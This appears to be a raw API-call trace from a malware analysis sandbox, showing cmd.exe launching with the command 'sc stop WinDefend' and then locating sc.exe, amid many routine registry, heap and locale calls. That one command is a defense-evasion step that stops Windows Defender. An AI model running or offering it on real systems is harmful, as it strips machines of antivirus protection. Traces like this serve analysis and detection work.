	[0084.921] RegCloseKey (hKey=0x40) returned 0x0
	[0084.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed64 | out: phkResult=0x22ed64*=0x40) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0x40, lpcbData=0x22ed68*=0x1000) returned 0x2
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x1, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0x1, lpcbData=0x22ed68*=0x1000) returned 0x2
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x0, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.922] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x9, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.922] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x9, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.922] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0x9, lpcbData=0x22ed68*=0x1000) returned 0x2
	[0084.922] RegCloseKey (hKey=0x40) returned 0x0
	[0084.922] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf55
	[0084.922] srand (_Seed=0x5cdadf55) 
	[0084.922] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0084.922] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	[0084.922] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.922] GetProcessHeap () returned 0x3d0000
	[0084.922] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3e1b88
	[0084.922] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1b90, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0084.922] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0084.922] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0084.922] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0084.922] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0084.923] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0084.923] GetProcessHeap () returned 0x3d0000
	[0084.923] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e0a48 | out: hHeap=0x3d0000) returned 1
	[0084.923] GetEnvironmentStringsW () returned 0x3e2658*
	[0084.923] GetProcessHeap () returned 0x3d0000
	[0084.923] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x8aa) returned 0x3e01a8
	[0084.923] FreeEnvironmentStringsW (penv=0x3e2658) returned 1
	[0084.923] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0084.923] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0084.923] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0084.923] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0084.923] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0084.923] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0084.923] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0084.923] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0084.923] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0084.923] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0084.923] GetProcessHeap () returned 0x3d0000
	[0084.923] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x30) returned 0x3e0038
	[0084.923] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fb30 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x22fb30, lpFilePart=0x22fb2c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22fb2c*="system32") returned 0x13
	[0084.923] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0084.923] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x22f8ac | out: lpFindFileData=0x22f8ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x3e0a60
	[0084.923] FindClose (in: hFindFile=0x3e0a60 | out: hFindFile=0x3e0a60) returned 1
	[0084.924] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x22f8ac | out: lpFindFileData=0x22f8ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x3e0a60
	[0084.924] FindClose (in: hFindFile=0x3e0a60 | out: hFindFile=0x3e0a60) returned 1
	[0084.924] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0084.924] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0084.924] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0084.924] GetProcessHeap () returned 0x3d0000
	[0084.924] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e01a8 | out: hHeap=0x3d0000) returned 1
	[0084.924] GetEnvironmentStringsW () returned 0x3e01a8*
	[0084.924] GetProcessHeap () returned 0x3d0000
	[0084.924] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x8da) returned 0x3e2f40
	[0084.924] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1
	[0084.924] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.924] GetProcessHeap () returned 0x3d0000
	[0084.924] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e0038 | out: hHeap=0x3d0000) returned 1
	[0084.924] GetProcessHeap () returned 0x3d0000
	[0084.924] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400e) returned 0x3e3828
	[0084.925] GetProcessHeap () returned 0x3d0000
	[0084.925] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x30) returned 0x3e0038
	[0084.925] GetProcessHeap () returned 0x3d0000
	[0084.925] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e3828 | out: hHeap=0x3d0000) returned 1
	[0084.925] GetConsoleOutputCP () returned 0x1b5
	[0084.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0084.925] GetUserDefaultLCID () returned 0x409
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5a4950, cchData=8 | out: lpLCData=":") returned 2
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fc70, cchData=128 | out: lpLCData="0") returned 2
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fc70, cchData=128 | out: lpLCData="0") returned 2
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fc70, cchData=128 | out: lpLCData="1") returned 2
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5a4940, cchData=8 | out: lpLCData="/") returned 2
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5a4d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5a4d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5a4d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5a4cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5a4c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5a4c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5a4c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0084.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5a4930, cchData=8 | out: lpLCData=".") returned 2
	[0084.927] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5a4920, cchData=8 | out: lpLCData=",") returned 2
	[0084.927] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0084.932] GetProcessHeap () returned 0x3d0000
	[0084.932] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x20c) returned 0x3d0828
	[0084.932] GetConsoleTitleW (in: lpConsoleTitle=0x3d0828, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.150] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0085.151] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0085.151] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0085.151] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0085.151] GetProcessHeap () returned 0x3d0000
	[0085.151] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x400a) returned 0x3e3828
	[0085.151] GetProcessHeap () returned 0x3d0000
	[0085.151] HeapFree (in: hHeap=0x3d0000, dwFlags=0x0, lpMem=0x3e3828 | out: hHeap=0x3d0000) returned 1
	[0085.151] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0085.151] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0085.151] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0085.151] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0085.151] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0085.151] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0085.151] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0085.151] GetProcessHeap () returned 0x3d0000
	[0085.151] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x58) returned 0x3d0a40
	[0085.151] GetProcessHeap () returned 0x3d0000
	[0085.151] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe) returned 0x3dd508
	[0085.152] GetProcessHeap () returned 0x3d0000
	[0085.152] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x28) returned 0x3d0aa0
	[0085.152] GetConsoleTitleW (in: lpConsoleTitle=0x22f968, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.152] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0085.152] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0085.152] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0085.153] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0085.153] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0085.153] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0085.153] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0085.153] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0085.153] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0085.153] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0085.153] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0085.153] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0085.153] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0085.153] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0085.153] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0085.153] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0085.153] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0085.153] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0085.153] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0085.153] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0085.153] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0085.153] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0085.153] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0085.153] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0085.153] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0085.153] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0085.153] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0085.153] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0085.153] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0085.153] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0085.153] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0085.153] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0085.153] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0085.153] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0085.153] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0085.153] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0085.153] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0085.153] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0085.153] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0085.153] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0085.153] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0085.153] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0085.154] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0085.154] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0085.154] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0085.154] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0085.154] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0085.154] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0085.154] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0085.154] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0085.154] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0085.154] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0085.154] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0085.154] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0085.154] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0085.154] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0085.154] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0085.154] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0085.154] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0085.154] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0085.154] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0085.154] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0085.154] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0085.154] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0085.154] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0085.154] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0085.154] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0085.154] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0085.154] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0085.154] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0085.154] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0085.154] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0085.154] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0085.154] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0085.154] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0085.154] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0085.154] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0085.154] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0085.154] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0085.154] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0085.154] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0085.154] GetProcessHeap () returned 0x3d0000
	[0085.154] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x210) returned 0x3d0ad0
	[0085.154] GetProcessHeap () returned 0x3d0000
	[0085.154] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x2e) returned 0x3d0ce8
	[0085.155] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0085.155] GetProcessHeap () returned 0x3d0000
	[0085.155] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x418) returned 0x3e1da0
	[0085.155] SetErrorMode (uMode=0x0) returned 0x0
	[0085.155] SetErrorMode (uMode=0x1) returned 0x0
	[0085.155] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3e1da8, lpFilePart=0x22f488 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f488*="system32") returned 0x13
	[0085.155] SetErrorMode (uMode=0x0) returned 0x1
	[0085.155] GetProcessHeap () returned 0x3d0000
	[0085.155] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e1da0, Size=0x36) returned 0x3e1da0
	[0085.155] GetProcessHeap () returned 0x3d0000
	[0085.155] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e1da0) returned 0x36
	[0085.155] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0085.155] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0085.155] GetProcessHeap () returned 0x3d0000
	[0085.155] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x144) returned 0x3d0d20
	[0085.155] GetProcessHeap () returned 0x3d0000
	[0085.155] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x280) returned 0x3e1de0
	[0085.160] GetProcessHeap () returned 0x3d0000
	[0085.160] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3e1de0, Size=0x146) returned 0x3e1de0
	[0085.160] GetProcessHeap () returned 0x3d0000
	[0085.160] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3e1de0) returned 0x146
	[0085.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0085.160] GetProcessHeap () returned 0x3d0000
	[0085.160] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0xe0) returned 0x3d0e70
	[0085.160] GetProcessHeap () returned 0x3d0000
	[0085.160] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d0e70, Size=0x76) returned 0x3d0e70
	[0085.160] GetProcessHeap () returned 0x3d0000
	[0085.160] RtlSizeHeap (HeapHandle=0x3d0000, Flags=0x0, MemoryPointer=0x3d0e70) returned 0x76
	[0085.161] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0085.161] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x22f204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f204) returned 0x3d0ef0
	[0085.162] GetProcessHeap () returned 0x3d0000
	[0085.162] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x14) returned 0x3d0f30
	[0085.162] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1
	[0085.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x22f204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f204) returned 0xffffffff
	[0085.162] GetLastError () returned 0x2
	[0085.162] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x22f204, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f204) returned 0x3d0ef0
	[0085.162] GetProcessHeap () returned 0x3d0000
	[0085.162] RtlReAllocateHeap (Heap=0x3d0000, Flags=0x0, Ptr=0x3d0f30, Size=0x4) returned 0x3d0f30
	[0085.162] FindClose (in: hFindFile=0x3d0ef0 | out: hFindFile=0x3d0ef0) returned 1
	[0085.162] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0085.162] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0085.162] GetConsoleTitleW (in: lpConsoleTitle=0x22f6fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0085.162] InitializeProcThreadAttributeList (in: lpAttributeList=0x22f584, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22f64c | out: lpAttributeList=0x22f584, lpSize=0x22f64c) returned 1
	[0085.162] UpdateProcThreadAttribute (in: lpAttributeList=0x22f584, dwFlags=0x0, Attribute=0x60001, lpValue=0x22f644, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22f584, lpPreviousValue=0x0) returned 1
	[0085.162] GetStartupInfoW (in: lpStartupInfo=0x22f540 | out: lpStartupInfo=0x22f540*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0085.162] GetProcessHeap () returned 0x3d0000
	[0085.162] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x18) returned 0x3d0ef0
	[0085.162] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0085.162] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0085.162] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0085.162] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0085.162] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0085.163] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
